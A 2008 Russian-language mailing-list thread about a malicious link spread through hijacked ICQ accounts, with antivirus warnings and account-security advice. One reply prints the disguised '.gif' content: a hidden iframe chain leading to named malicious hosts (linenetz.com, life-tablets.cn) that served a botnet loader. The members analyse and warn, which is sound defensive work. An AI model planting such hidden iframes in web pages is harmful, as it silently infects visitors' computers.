Отправляет email-рассылки с помощью сервиса Sendsay

[TC] Что такое http://absoluts.org/img/live.gif

Приветствую всех!
Тут один товарищь прислал мне ссылочку по аське...
ПОпытался ради интереса туда сходить и вот что выдал Касперыч на пару с Фирефоксом:
Антивирус Касперского 2009

Антивирус
Касперского 2009
ДОСТУП ЗАПРЕЩЕНЗапрашиваемый URL-адрес не может быть предоставлен
URL-адрес:
http://absoluts.org/img/live.gif
Доступ к запрашиваемому объекту запрещен Сообщение создано:
Tue Nov 04 22:29:02 2008
Антивирус Касперского 2009
ВОт и охотелось бы узнать брод прежде чем лезть в него...
Кто нибудь может объяснить, что это всё значит?
С уважением Сергей,г.Екатеринбург
ICQ:498227827

Ответить   Сергей Tue, 4 Nov 2008 22:38:00 +0300 (#787401)

 

Ответы:

Vande omentaina, Сергей!

Это вирус!! Если кто ещё примет по асе эту ссылку, удаляйте её
нещадно.

Ответить   Anarendil Tue, 4 Nov 2008 19:52:32 +0200 (#787403)

 

Доброе время суток, уважаемые участники рассылки и Anarendil!
Мне есть, что ответить на письмо от 4 ноября 2008 г., 20:52:32

Не всё так просто: с этого url идёт редирект, поскольку такого файла
нет, а по редиректу сидит BotNetLoader, т.е. вирус, который ставит ваш
комп в бот-сеть и вы начнёте рассылать спам наряду с сотнями других
компьютеров-зомби, помните, что сейчас провайдер может отключать от
интернета тех, чьи компы сильно завирусованы и безобразничают в сети
тайком от своего владельца, прецендентов уже много, будьте бдительны!
зы
сцылка проверялась в виртуальной машине, куда благополучно установился
ботнетлоудер.

Ответить   Tue, 4 Nov 2008 21:24:09 +0300 (#787411)

 

Здравствуйте вам, yuniks!
Несколько слов по теме "[TC] Re[2]: Что такое http://absoluts.org/img/live.gif":

Такая ссылка приходила мне в ICQ от парня с ником Лис. Я удивился,
зачем он прислал мне картинку и не открыл. :)

Ответить   Tue, 4 Nov 2008 20:58:35 +0200 (#787422)

 

привет.

кстати, нечто подобное, похоже, случается с клиентами, альтернативными
icq. считаю, что не стоит бросаться менять номер icq или пытаться
изменить пароль. надо переждать время. как только человек поймет, что
выгоды от подобных действий нет, он это делать перестанет.
Мацал Кошек

Ответить   Tue, 04 Nov 2008 22:03:49 +0300 (#787425)

 

Vande omentaina, Stelazine!

Да это не человек, это у него комп вирусами заражён...

Ответить   Anarendil Tue, 4 Nov 2008 21:30:41 +0200 (#787432)

 

привет.

а якобы от меня другим тоже послания такого рода приходили. а комп не
заражен. тут что-то другое.
человека и выгоду я имел в виду реального, которому выгодно спамить.
Мацал Кошек

Ответить   Tue, 04 Nov 2008 22:49:57 +0300 (#787437)

 

Доброе время суток, уважаемые участники рассылки и Stelazine!
Мне есть, что ответить на письмо от 4 ноября 2008 г., 22:49:57

Вот это странно, в протоколе icq нельзя подделать номер, на сколько я
знаю, так что возможно асю не угнали, а просто увели пароль, но асю не
угоняют, а заходят в твоё отсутствие и спамят, иссессинно, что всё
это делает программа, а не человек.

Ответить   Wed, 5 Nov 2008 00:24:14 +0300 (#787445)

 

привет.

тут ты, скорее всего, прав. однажды столкнулся с двойным входом. да и в
аське редко бываю. а как поменять пароль на сервере, не нашел. вроде в
icq 5 была такая возможность, но теперь она не работает без обновления
на 6-ю версию. а та не работает с джозом.
Мацал Кошек

Ответить   Wed, 05 Nov 2008 01:39:41 +0300 (#787454)

 

Здравствуйте, Уважаемые участники рассылки!

Stelazine пишет:

Почему в прошедшем времени - "приходили" :-О? Оно же не прекратилось у тебя -
Дня три назад опять от твоего имени грязь
мне приходила. На сей раз денег не просили - просто как обычно ссылка без комментариев.
А логика у этой программки
странная - стоит ей ответить что-нибудь на вроде "пошёл отсюда, спамер" - контакт
сразу покидает сеть :))).

Ответить   carrying_rain Wed, 5 Nov 2008 11:53:05 +0500 (#787494)

 

Здравствуйте!!!

Original Message > А логика у этой программки

Ну правильно. Она может денег попросить, но разумной беседы поддерживать не
может. Просто контакт отключается и оставляет получателя делать вывод о том,
что у твоего друга или подруги Аська заглючила и отрубилась, или доступ в
Интернет, или ещё что.
С уважением, Алексей.

Ответить   Thu, 13 Nov 2008 00:23:42 +0500 (#789355)

 

Здравствуйте, Stelazine.

Вы писали 4 ноября 2008 г., 21:03:49:

а мне кажется, что Лёшка этим заниматься не будет.
скорее всего - раз-бот, два-бот, три-бот!:)
может сам выскажется насчёт этого?;)

Ответить   Alexandr Gulis Tue, 4 Nov 2008 21:44:16 +0200 (#787434)

 

Здравствуйте, Alexandr.

Вы писали 5 ноября 2008 г., 0:44:16:

выскажусь, действительно мне есть чем заняться.
самое интересное что тут скорее имеет место подбор пароля.
так как после того как я узнал что от моего имени пришла ссылка, то я
первым делом проверился на вирусы, проверялся доктором вебом, каспером
и авирой. вирусов нетути проверял еще какой-то трояно искалкой она
тоже молчала.
решил перестраховаться и поменял в асе пароль а также переставил
винду, все равно уже пара было это сделать.

теперь вопрос что еще можно сделать?

Ответить   Thu, 6 Nov 2008 20:04:54 +0500 (#787982)

 

Доброе время суток, уважаемые участники рассылки и lis!
Мне есть, что ответить на письмо от 6 ноября 2008 г., 18:04:54

Пароль надо не менять, а запросить новый с сайта, т.к. если в асе
сидит троян, то факт смены пароля он зафиксировал и отправил новый
пароль своему владельцу.

Ответить   Fri, 7 Nov 2008 01:00:00 +0300 (#787990)

 

привет.

а по-другому и не поменять пароль. только через сервер.
а если троян, то почему он и новый пароль, полученный на сервере, не
отправит?
Мацал Кошек

Ответить   Fri, 07 Nov 2008 01:15:22 +0300 (#787993)

 

Здравствуйте, yuniks.

Вы писали 7 ноября 2008 г., 3:00:00:

так я его после переустановки поменял, так что это врядли.

P. S. если в ближайшее время от меня придёт какаянить ссылка которую
вы у меня не просили, или прозьба чтонить куданить отправить,
пожалуйсто не делайте этого.

Ответить   Fri, 7 Nov 2008 10:38:58 +0500 (#788140)

 

Здравствуйте все!!!

Original Message > Такая ссылка приходила мне в ICQ от парня с ником Лис. Я удивился,

Не знаю, что происходит, но сказать могу одно. Сейчас, без ведома
пользователей ICQ рассылаются сообщения от их имени. Сообщения, как я понял,
рассылаются по списку контактов пользователя.
Сообщения бывают разными. Со ссылками, рекламой.
Недавно, у одного моего знакомого была такая штука.
От его имени, всем его контактёрам пришло сообщение с просьбой выручить
деньгами. Для этого надо было просто отправить SMS на короткий номер. И
нашёлся среди его друзей чел, который на это купился.
Так что, если что-то подобное пришло от ваших знакомых, ещё не факт, что это
они отправляли. А тем, от чьего имени отправляются сообщения, советую
проверить комп на вирусы.
Кстати, забавная штучка про Autorun.inf вирусы на флэшках. Они очень
культурно взаимодействуют друг с другом. Если в завирусенный компьютер
вставить флэшку, завирусенную другим вирусом, вирус с этого компа не
заменяет Autorun.inf, а дописывает его. :-)
Вот Jaws с флэшки так запустить проблема, а там всё работает. :-)
Правда, там в файлах Autorun.inf целые романы написаны.
С уважением, Алексей.

Ответить   Thu, 13 Nov 2008 00:10:41 +0500 (#789351)

 

Здравствуйте, Уважаемые участники рассылки!

VIKTORIUS пишет:

отправляются сообщения, советую

Недавно мне потребовалось зайти из Миранды в "контакты на сервере" и я была несказанно
удивлена - оказывается, у меня именно на сервере,
а не в контакт-листе, живёт несколько каких-то сршенно незнакомых мне контактов
с ничего не говорящими никами (1 так вообще
выглядел как набор букв и цифр) :-О. На всяк.случай проверила - их я точно никогда
не добавляла и не встречала в своём
контакт-листе. Собственно, вопрос - это что, первые
признаки, что от моего имени скоро начнут рассылаться "левые сообщения"? Если
так, то моя Аська и правда самый удобный вариант для этого, ибо
я её оч.редко пользую. Удалила я непрошенных, но Таки интересно, каким образом
незнакомые контакты просачиваются на сервер, есть ли в этом
опасность и, если да, то как защитить аккаунт на сервере? Сейчас, пока писала
этот вопрос, решила проверить, не
появилось ли в списке на сервере ещё кого новенького и, о ужас! Теперь я вообще
не могу туда зайти - при нажатии кнопки
"управление контактами на
сервере" Миранда стала просто вылетать с ошибкой и открыть их стало невозможно...
Вопрос мой прост до смешного: "к чему бы всё это?" ;)...

Ответить   carrying_rain Fri, 28 Nov 2008 17:25:03 +0500 (#793907)

 

Здравствуйте, yuniks.
Original Message | Не всё так просто: с этого url идёт редирект, поскольку такого файла
| нет, а по редиректу сидит BotNetLoader...

Редиректа не обнаружил, а обнаружил файлик с расширением .gif, который с помощью
DM исправно закачался. Поначалу насторожил подозрительно малый размер для файла
такого формата- 282 байта. Потом я сменил его расширение на .txt, открыл в блокноте
и прочитал там следующее:

<img src="2410232.jpg">

<iframe src="http://linenetz.com/stats/ru1.php"
style="display:none">
</iframe>

То есть при открытии его в браузере должна будет отобразиться именно картинка.
Ну и еще исполниться некий загадочный скрипт ru1.php.
В этом файле ru1.php написано так:

<iframe src="http://life-tablets.cn/td/index.php" style="display:none"></iframe>

Короче яйцо в утке, утка в зайце, заяц в сундуке, сундук на острове, а остров
хрен знает где.
В этом последнем индексе какой-то мудренный скрипт. Язык не обозначен.
Остроумная штука.

Эдик. г. Ленинск-Кузнецкий
winks***@r*****.ru

Ответить   Tue, 4 Nov 2008 22:38:40 +0300 (#787430)

 

Доброе время суток, уважаемые участники рассылки и Эдуард!
Мне есть, что ответить на письмо от 4 ноября 2008 г., 22:38:40

Попробуйте откатать все переходы в виртуальной машине, на этапе
выполнения php скрипта вы его и получите, а дальше, как говорится,
добро пожаловать в бот-сеть.

Ответить   Wed, 5 Nov 2008 00:27:08 +0300 (#787446)

 

Здравствуйте, Сергей,

Вот что выдаёт ESET Smart Security при попытке войти на указанный
адрес файерфоксом. Цитата:

Тревога антивирусной системы ESET Smart Security
Доступ запрещен!

Подробности:
Веб-страница:
http://absoluts.org/img/live.gif
Описание:
ESET Smart Security заблокировал доступ к веб-странице.
Страница находится в списке веб-сайтов с потенциально опасным
содержимым.
Конец цитаты.

Судя по сообщению, и Касперский, и НОД32 имеют чёрные списки сайтов.
Это один из них.

--
С наилучшими пожеланиями
Владимир Лукьянов, Москва

Ответить   Wed, 5 Nov 2008 10:13:11 +0300 (#787509)